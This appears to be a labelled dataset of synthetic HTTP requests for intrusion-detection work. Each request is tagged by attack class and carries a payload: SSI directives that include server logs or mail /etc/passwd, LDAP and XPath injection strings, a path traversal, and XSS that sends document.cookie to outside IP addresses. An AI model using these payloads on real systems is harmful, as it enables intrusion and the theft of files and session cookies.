If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 0
MIME-Version: 7.7
Pragma: co=ibi
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=aae5
Range: -017,-1,-32
Referer: http://n3fll5i.biz/on75h/o23clec2/wtojaorj/oefsuahE.tar
TE: trailers,chunked
Trailer: From
User-Agent: Mozilla/5.2 (X11; U; Linux i586 5.4; eN-rh; rv:6.7.5) Gecko/71492238
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7165x674
Via: onmdt/3.2 www.nn1l.html:6, FTP/5.8 www.ttswnyn.png, 7.2 www.tThadooj.js
Transfer-Encoding: compress
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47667
Start - Id: 39516
class: SSI
GET /zlstyleDpwp-u6Wvc/amvp@tLWFT0/yt/nlzOG833628/lt/dQ/aBBaq7DafKSz/ggBbZqFh7O4IaORcq/Aw/sqsnmotao.php?mola=epO&ceevyxnices1Qnk=3045112&eviwhceehAai=45 HTTP/1.1
Host: 226.113.220.240
Connection: ctcUr2al
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.1, identity, deflate, identity;q=0.0
Accept-Language: *
Cookie: NVTeaonforln=mssa348el7dErFab;otsOm=399973817;bKUUrzprocessing-instructioniRK1http=<!--   #include virtual="/var/log/httpd/access.log"     -->;hqinpU=59212;nNoEsoh=ysifioahEdnrs
Date: Wed, 05 Jul 06 13:19:32 CET
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
If-Modified-Since: Mon, 19 Apr 04 21:20:10 UTC
If-Unmodified-Since: Wed, 30 Aug 06 19:44:21 CET
If-Match: "TsZ7MaNaanIWRzg"
If-None-Match: "5XBiRbnU8U0Ks_LRLij2"
Max-Forwards: 3400
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Referer: /tzwirx/ep8ya.txt
TE: gzip;q=0.9,trailers
User-Agent: Mozilla/0.1 (Windows; U; Win98 9.2; da-ep; rv:3.6.5) Gecko/33168859
Via: 2.7 18.154.175.216:67032, 0Olct/1.3 www.bt8n4i.jpeg, FTP/8.8 www.ejen9xtn.jpg
X-Forwarded-For: 81.239.118.138

null

End - Id: 39516
Start - Id: 39044
class: LdapInjection
PUT /soeeds/azncan/laLaoen2dwa/nDgXVbSfafnwUL3/1-I.U-mI5g9uv02z44C/n5h6lnn6i6tmrusrO/uofe5to0hesvnc/t5Fx/YwjausadtNhhlosad.pl? HTTP/1.0
Content-Length: 135
Content-Language: Ha,N,gA
Content-Encoding: gzip
Content-MD5: aGFvcmQ2cmlydG5sZW5kdg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 11 Feb 05 10:07:35 CET
Host: www.3onaEh.net:007
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: x-mac-icelandic;q=0.1, iso-8859-1;q=0.2, windows-1257;q=0.3, euc-kr;q=0.6
Accept-Encoding: 
Accept-Language: tylhe-C;q=0.3, 6s5ie-2E7;q=0.7, fpnedpX-Caoeti, f-oeAeted0, zhsEiaee-cefnhoee;q=0.6
Cache-Control: max-age=5
Date: Sat, 10 Mar 07 24:29:33 CET
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: *
If-None-Match: *
If-Range: "-Gt5NG.BxIijq6uns0HS"
Max-Forwards: 01
Pragma: no-cache
Referer: /duaarT/soeiazs/eale.mp3
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: )( | (bes=qe*)
Via: 6.6 www.eyet.shtml:7481, oxiaoa/9.1 188.167.75.34:491
Upgrade: Are/6.6, yyhe4a/3.0, 7eytto/3.0, joo2/5.9
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

onamky95eeT=23&mEQJWQF.FoZ=631753&bTinyiuloisriee=32&tryh= rt&nuoe=70&7si0rfpeoibab=582183&osesilsht= 27&l6ee2bdtaiairlt=n&5etou=sINcif

End - Id: 39044
Start - Id: 36155
class: PathTransversal
GET /e.@TC39GId8UkWP.eqyz/6aauvg/QXJpAhconnectdG/ftfnjbaialu/6s/natdcvrgT0g/Dl.gif?s7sie=echot&hnah=e6%40RTt-&est6isscngsemzu=clw3oqtny&tet2nolb01l=012&ch5Oiv3oaemliwd=otgo&baeshlhtnaurdli=3&7igNeIa=18&O4_G8G=O0avdWo4eou&7roKGZDU.=ete&ydfil1aa=o%3A%5Cautoexec.bat&Cvqvpcscript05oeO=tm1Y&lfeAr=160491&ivf6Iosebtcaa2o=86097&esrIaRss=rxe8rer6scatsasa&uroiudncnrV1i=ohyUnwssnmdAljIiL HTTP/1.0
Host: www.mtoln6nmC.com
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.6, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Date: Wed, 23 Apr 08 18:19:33 GMT
ETag: ".7NANGl.RLIY.vDMt.Ei"
From: rmee3leS@lenn.de
If-Modified-Since: Fri, 09 May 08 14:46:43 GMT
If-Unmodified-Since: Thu, 05 Apr 07 22:10:32 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 1346
Pragma: emug=edieona
Authorization: alNdRr eonogUyo=tHrIx9
Referer: /4RtMe/sey6nb.mdb
User-Agent: 0haeqes (ngkisdEk)
UA-Color: color16
Via: 6ss/6.0 www.bccr.tiff
Transfer-Encoding: identity
X-Forwarded-For: 11.225.138.134
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36155
Start - Id: 38104
class: LdapInjection
GET /uArg6eiml/Zwybin7Wsk/ssiovota/Yaoaae.tiff?4n=hahwsVtooEa8oniframe%29%27he&@o_uconnecth4=hSB&pituaoh7e=270&uiEwrviuzntIh=ianode5h6%2Boptt-iTqe&ziOaJeefn=657&iWehltayb1lnf=tiiejvnhttp&tEmii8ma470tt=2e+We%29fl&kdscibiogerhn=iago&toghheahpeed=snmxH%40GuKtCO&3tvbhxu=%29++++%28+++%7C++%28displayName%3Dhad*%29+%28name++%3D+had*%29%28++mail%3Dhad*+++%29&hquh6xsfro5d=n8%27%40son&rItHscriptNvNB=insrr HTTP/1.1
Host: 81.194.7.51
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.5, euc-cn;q=0.1
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 223.239.75.68
Cookie: FNWlykX%ue=621;it4boyScaq=e%40E;cseerasaetrdyah=r+aeammochaxp_+L
Cookie2: $Version="3"
Date: Sun, 04 Jul 04 09:31:37 GMT
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 08 Nov 07 15:13:20 CET
If-Unmodified-Since: Sat, 06 Nov 04 13:37:48 GMT
If-Match: *
If-None-Match: "t.1qt@0u4ckgzYDlC@uK"
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 013
MIME-Version: 2.3
Pragma: rUait='Ler'
Proxy-Authorization: ntddnv dr9t=oezhv
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: /blxG/tMietCea/aente9.jpg
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: 8rIAHJ8 http://www.yldi2.fr
UA-CPU: 68000
UA-Disp: 2082,219,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.2 149.27.137.253
Transfer-Encoding: deflate
Upgrade: s8aa/8.6, yeyo7a/9.5
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38104
Start - Id: 36951
class: LdapInjection
PUT /hJ/tdmI1crr/37/pactkskra/i1Prbvo/lithaed7m/ne1warrlisib/l4@OMViAbm/u.oO.T41aCrb/tfWSQje/ipGOLgkEBiRKOSfdA.css? HTTP/1.1
Content-Length: 269
Content-Language: nceNh,gtie,j
Content-Encoding: identity
Content-MD5: bWlpZXppVGJzcW5saDZtbw==
Content-Type: application/x-www-form-urlencoded
Host: www.sqj2aE.biz
Connection: aBehyes
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, gzip;q=0.5, compress, compress;q=0.2, gzip;q=0.9
Accept-Language: mh-xltae;q=0.7, d9eiytt-mnmtNm, eie9bx-m
Cache-Control: no-store
Cookie2: $Version="5"
Date: Thu, 18 Mar 04 04:40:15 UTC
If-Match: "zwtkQNFqX@6-lHBGjYiV"
If-None-Match: "ZqsAtlCEgc8VmF."
MIME-Version: 6.6
Authorization: Basic NmlhRWE6aWtlc1pu
Range: -69,-806
Referer: /tua4oe/mrlotiro/oifaeoAt/5a6e/rtoa.mpg
User-Agent: gs5ne (silsN1oFqK; iPTnx-@0; sA5plBHm3p; z@sJqx_; s-7VQY.)
UA-OS: Win98
Via: 4.6 www.owac.shtml, HTTP/1.1 www.e0ote.htm
Transfer-Encoding: gzip

N-TKrqne0=?0un1bwinnt&D@adminVJaccept=um6<a&i4yDentsr858e=)    (|(displayName=had*)  (name =    had*  )(   mail=had*   )&eLonser=?o6;ov$etruoh%&q1n=fier<5o2i&sanoeteistise=dbNvuImagN3eez&s2pa=dsi&atwaTthsn=vte7oarPI&d6hselectNc=595

End - Id: 36951
Start - Id: 35734
class: XPathInjection
GET /hd0houoc6oo2was/xjjLbQyO/sock_streamI8y3yjEVadmin./telnetperlR24samlogRwJDvUU.css?n5uCFxL=%25wymtmpr&att8t=oha9sa&6ath=04&oo=u1isldftTNec&acrlrit0hi8vi=6&fomKhnns=aa&aWRW.wRH=912&hze=nE600iayd&cwwnyrrvE=dZWJPm4b&ordch6sataitiEe=55698&2m38esg2rakxe=6480&yal=4039540&pN_having-fQ0VD=crm%27+or+1%3C++++sttNa%2FwufM%2Fba%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++or++%27daBl%27++%3D%27&qR47EkC9LKXN=uIGerl HTTP/1.0
Host: www.nAaeeeu.gov
Connection: close
Accept: audio/basic, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rninihe-sEu;q=0.7
Cache-Control: no-transform
Client-ip: 55.42.106.115
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="4"
Date: Sat, 30 Jan 10 17:14:06 CET
ETag: "gAVCxqp8C2MJTDnPF54"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 9015
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest nonce
Range: 820401-
Referer: /e4eh/oblrq.nsf
TE: gzip,trailers
Trailer: Expect
User-Agent: sdCeta/3.3.0.0
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/7.5 55.50.151.27, hiAtn/7.8 www.etihU.jpg
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 062 28.97.213.16:8903 "sReeeib4oHnlluegrtr" "Fri, 31 Oct 08 14:57:27 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35734
Start - Id: 37750
class: LdapInjection
GET /3rrkn0cnyeetFet5hb/tWG@/hYLAosa4UVCCJF7aW1m/rq2c/kWFcy60vLF_z/eV.exe?v2pmotedtrooh=ttT-whereomreetxmu&sesh=%7Ece6qrl&6eaicpit1sdfaA=y+v3rp6sboot.inie4Sg&e0uoW=94739&ijlenYTsaern=n+al&o7=m1ov5&0adu2hnXlit=m%2Fstrmsag&4enz=oaEen%29%28+++%7C+%28gats%3D*%29&gAhws=anthh8gets&J9aK4pV=820704&oipe=seuU&enand=oFPX1vbx8&group byPAkROEC_I=ia1i&ch=ioanS1ckatusnyn&ie=aPm4e6M HTTP/1.0
Host: www.ioereiattV.uk
Connection: haeafhk
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.8, gzip, gzip, identity;q=0.0, compress;q=0.7
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 18.137.252.198
Cookie: ica=t9lim roch;5eansaetyt=ekvial;oridbds=ste;iaaicc=pf
Cookie2: $Version="98"
Date: Thu, 26 Nov 09 21:56:18 GMT
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Tue, 18 Sep 07 13:11:51 GMT
If-Unmodified-Since: Wed, 11 Feb 04 18:23:55 UTC
If-Match: "TT0@dGZrYb7MKmHcoWF"
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: "gSUKkBYD5J9.RttPpT"
Max-Forwards: 89
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 77072-956,71936-1169
Referer: http://etnn.fr/tslHc/0stye/ngaee.wav
TE: deflate,gzip;q=0.2,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: vhta/9.3
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: 6.2 76.136.109.186
Transfer-Encoding: compress
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37750
Start - Id: 40131
class: SSI
GET /TclIo/o4omcpoRr/jSMgimozxUn5rei08/XAEA2P/et7shaotneitwttah/y_ULkw3wKg2/shl7TJiM.aspx?iydnslnhbens=itItarofYaion6e&ehnnoeXaOyulm=8891617934&irlBassoir=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fmail++++mt.com+++++%3C++++%2Fetc%2Fpasswd%22--%3E&crOrrb=4Lmjtfrom0%3Fseev+ HTTP/1.1
Host: 42.185.15.25:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.4, x-mac-greek;q=0.9, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 93.85.29.94
Cookie: yICvmPvj-Sq=47
Cookie2: $Version="8"
Date: Fri, 03 Feb 06 10:49:15 UTC
ETag: "tz3ydL4nfTVnuO2VSMsG"
If-Modified-Since: Wed, 15 Dec 04 08:55:49 GMT
If-Unmodified-Since: Tue, 28 Jul 09 21:54:40 CET
If-Match: "8kj2Pjk3luepYRbOFYwI"
If-None-Match: "kjUZB0eJQiIVf8gA"
If-Range: "9B0bqGqxeNeIzAX9Q"
Max-Forwards: 01
MIME-Version: 6.1
Pragma: c1eqnn=a
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: 51Ar 5shchs=xydnaakN
Range: 86-29827,480182-539278,773981-8539
Referer: http://ceHie.be/aOtmk/terhGtft/ue0eEa.exe
TE: gzip;q=0.2
User-Agent: h1Atu2t/4.7.3
UA-Disp: 252,3445,16
UA-Color: color32
Transfer-Encoding: jhtieA
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40131
Start - Id: 48584
class: XPathInjection
PUT /oVr3beR7WoCJ8o.DF/mocha_ToptmailNP./4eebou/eosn3iehnferp/nAzjjCG-S/copy4SlYjd9.swf? HTTP/1.0
Content-Length: 253
Content-Language: noYawvo
Content-Encoding: deflate
Content-Location: http://www.eUhnus.ch/sntEr/eeTtrrc/aiLtn/s6aya.php
Content-MD5: NnJsZUxDbHlpYU5tME9pZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 04 08:53:35 CET
Last-Modified: Sun, 10 Feb 08 22:43:20 GMT
Host: www.niueacey.gov
Connection: haA1b3pf
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 58.151.109.14
Cookie: omni5Oh=V71rri2ehaelltN;imssaoruni=lodM4ewanfta;b0t5i4veuksez5=F4elsnsd6lyiT3oOo9;mtteihe=elogx;necXerER=osa+
Cookie2: $Version="380"
Date: Fri, 10 Jun 05 01:50:15 GMT
ETag: "pn9FUh6eD1tnxJb11"
Expect: giwPt=dOet;rlrwiz=tf8E
From: ebiq@eeIse.it
If-Modified-Since: Fri, 14 Jan 05 12:59:00 GMT
If-Unmodified-Since: Tue, 16 Jun 09 15:20:14 CET
If-Match: "ckqYw.luhGme_eVql"
If-None-Match: "n5MjbkQWHOFfv-aE0ND"
If-Range: Mon, 17 Dec 07 21:30:18 CET
Max-Forwards: 834
MIME-Version: 2.8
Pragma: Oeo='0rtews'
Proxy-Authorization: dlghi ebtehms=idn6ijs
Authorization: Basic N2V6cjphZXVxaWk3
Range: -13,5-
Referer: http://www.heoNtioe.com/dAonee13/Inirw4dB/GTeOt/diowm/wr8ioNna.dll
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 3.8; aS-hu; rv:4.9.8) Gecko/25559486
UA-CPU: StrongARM
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 2.0 www.Qe1dod.jpg:00, 7.4 108.101.108.34, 7.8 www.ul7ta.css
Transfer-Encoding: ctoo
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

at=spqKZyWBQ&OTPvyRsock_streambodynode=instha5snarwa&luaiepi7IssqaaE=fihs/di/h/child::node()[ position()=016]   |   reAoa/eptnm/nrsu/child::text()[position()=80]     or 'pasobnes'=  '&szU8pB=7zoL

End - Id: 48584
Start - Id: 48852
class: XPathInjection
GET /eii/weef/rlrlrr7seasr.tiff?Nfsz0no=aegielosekr&Inepct8=1104001&jE_.Sr_s@=tVb8&tttzWoMa=678&r4Rqsamu2=betweenm%25uaesEO%3Ele&heNot=qdan&siPgiabtiEHe5e=f1irEeOel&lxdr=6oeg%2F3c1otz%2Fk%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D96%5D+++or+%27mtgcoOdl%27%3D%27&tretq80b=toaa0-eet HTTP/1.1
Host: 248.115.250.198
Connection: ps6iygoa
Accept: application/*, application/*, application/rtf
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate
Accept-Language: ha91-eOI;q=0.0, aan-oTruaq;q=0.9, mtonaa4-vbi, eibiod-8edi;q=0.0
Cache-Control: max-stale=46
Client-ip: 250.77.251.179
Cookie: @vbscriptKmocha6abgsoundd=ltDibesngldst4tg8;teeo1=y E8McthiTgconnectpassthrun;ebskfiimtl0he=i7iX-Zdui_JL;nsduy68a=a7>Oaotmetaualhe;XB6U6PVEvl0=st9nsaii
Cookie2: $Version="45"
Date: Tue, 25 Mar 08 02:30:19 UTC
ETag: W/"rIDx8tDHtimlHt6H6"
Expect: 100-continue
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Sat, 22 Sep 07 17:53:36 CET
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Basic YU5oYmFucnI6aDg0ZWxUbnM=
Range: 5-03627
Referer: /ddxOy/ithnml/roef/rttts3eb/ihrH.ace
TE: chunked,chunked;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (X11; U; Open BSD i386 0.4; nx-Ef; rv:5.3.2) Gecko/70673156
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 842x5954
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: compress
Upgrade: Anfn/8.5, ere/1.4, 8ssixi/3.7, oAe/9.3, enwsi/1.1
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48852
Start - Id: 48972
class: XPathInjection
GET /tXdD5xW@b/ewekthv5ae2e0ye8er/U7LmfAPpUSUEvOe/pE0iitnqELes.tiff?JCFCE=rBFWZPCjMChD&eiU=en0ndperl%3Alatn&ien7ElRt=zwqKwHYmZser&ho=o&re=6374&p0liee=copy%29c&rLedehMnrej=j%2Fpao1%2Fsels%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D657%5D+++++or+%277vilhbrl%27+++%3D%27&mipie=7961432&fny=tmetaes&eethrO7eoeon6Ga=5827238&tren2yryseg=ac+tBhtstylehttm&5M2=linkgaccess_log&Ce1nhrsuaD7=2&NuqTeicetzc=inputhf9mz HTTP/1.0
Host: www.nhiaYa.gov
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: hz-gb-2312;q=0.2, x-mac-arabic, x-mac-arabic;q=0.4
Accept-Encoding: identity, deflate, compress;q=0.0, compress;q=0.6
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Thu, 24 Aug 06 19:21:58 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Tue, 01 Jan 08 08:42:04 UTC
If-Unmodified-Since: Fri, 05 Nov 04 17:39:07 UTC
If-Match: "FbroY8fbk.4kZOkT"
If-None-Match: *
If-Range: "HbC@i-uHkoCB70@3dl7"
Max-Forwards: 98
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://nhrltu.ch/Yntte/eedaseef.fgf
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: ohz-M. http://www.idhf.st
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 395x881
Via: 7.4 117.73.39.254
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48972
Start - Id: 47543
class: XSS
GET /Um0sosu/a8Z8cnujB.8gf/sEvU5/eZW/rusiirnp.png?Hes=df&8ahi5dmo=s%3Flink&_DjNIOLG7u=281926085&sy3h3t=oFDIN.OdNrmG&eorbrEe4meaG1e=wafetKdr&0ailrr8adhee=es9fDMwO9&ararz8akr=73603000&OwDirwteniumtia=%3Cimg+src%3D++%22++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F135.20.224.211%2Fro.jsp%27%2Bdocument.cookie%29%3B%5D++%22+%3E&anrgi=tdctpethat HTTP/1.0
Host: 11.27.82.182
Connection: keep-alive
Accept: audio/*
Accept-Charset: euc-tw, hz-gb-2312;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=09
Client-ip: 124.42.14.246
Cookie: reidIjp=1517;Ecoilhdoeerrwcg=tqr2s r1nfesnms
Cookie2: $Version="5"
Date: Sat, 16 Apr 05 11:12:42 GMT
ETag: "Ala8XxVK9Sh-lb6G@F"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Fri, 05 Mar 10 13:57:45 UTC
If-Match: *
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 42
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=/kldnret/2UzEy/cbia3dnl.aspx
Range: 8094-,77-91254,-8945
Referer: http://gedie.be/tescE.asmx
TE: chunked
Trailer: If-None-Match
User-Agent: ti0cese (aINtLrzdee; s7YYZ6L; ojpVsa8NZ5; ap-joRy; rHu8w4DN)
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: nee2iV/8.8 www.lsure.tiff, 1.4 253.238.240.73
Transfer-Encoding: gzip
Upgrade: sdout/1.8, ioe/1.0
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47543
Start - Id: 49840
class: XPathInjection
GET /9mnsosa/dptF7etrsaoaniUqe/j@vwrm_H.ZwIm/goq/hee/0Y4-/seyaceotla/esheoEhksroi/G_quF_n/hnAanNifOmjt5tsbsono.css?aepcn=f6RrdE7+&cma3ewia5h=h3rkl&whTseomoctrnh3=87&zo=%28i+%3C+++count%28itw2%2Fchild%3A%3Atext%28%29%29+++and+++j++++%3C+++count%28tavte%2Fchild%3A%3Acomment%28%29%29++and+k+++%3C++++count%28rrkTx%2Fchild%3A%3A*%29++%29&audSvitrsygw=1063024 HTTP/1.1
Host: 148.152.187.250
Connection: keep-alive
Accept: text/*, audio/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 146.101.131.153
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Mon, 19 Jun 06 08:32:02 UTC
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: co0mriru
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Sat, 16 Dec 06 07:30:04 GMT
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 70
MIME-Version: 4.3
Pragma: wxf=am
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: shTa ehe54fha=rlugc
Range: 376648-,445-
Referer: http://uaetoged.it/m1tSoae/nseL/taOheeq/dlzcole/Ijlt.ace
TE: trailers,deflate;q=0.4
Trailer: Accept
User-Agent: t9oi/6.4
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: qtplca/7.0 www.he6tWdg5.gif
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 6075380404911977
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49840
Start - Id: 46748
class: XSS
GET /nm8cyiegDI/c0Ic9tSScqqo9/gdpsultEhmplbecem5rr/odpacaltntyss3ieexT.jpeg? HTTP/1.0
Host: www.dnaoRydo.com:80
Connection: lkoicaz
Accept: */*
Accept-Charset: us-ascii;q=0.5, x-mac-roman;q=0.1, windows-1254, windows-1257
Accept-Encoding: deflate;q=0.4, gzip
Accept-Language: pmoaebib-NhsItio;q=0.5, sswuqepf-7, O-qsanw, eOliilx-OyX;q=0.8, ET-qIctzar;q=0.0
Cache-Control: no-store
Cookie: h4ocw=<meta    http-equiv   =  "    refresh  "     content  = "0;url=javascript: [window.open('http://249.152.228.202/ve.exe'+document.cookie);]  "    >;XZisiteiysnr=eqB7fihh;F-89FFbodyGaif=taedws0ao7veI;8mevo7fgeBeal7t=9371589
Cookie2: $Version="2"
Date: Tue, 23 Aug 05 07:56:01 GMT
ETag: "J.TJLmAEqK6XqFn6"
Expect: 100-continue
From: Nbtsa@emewereOk.com
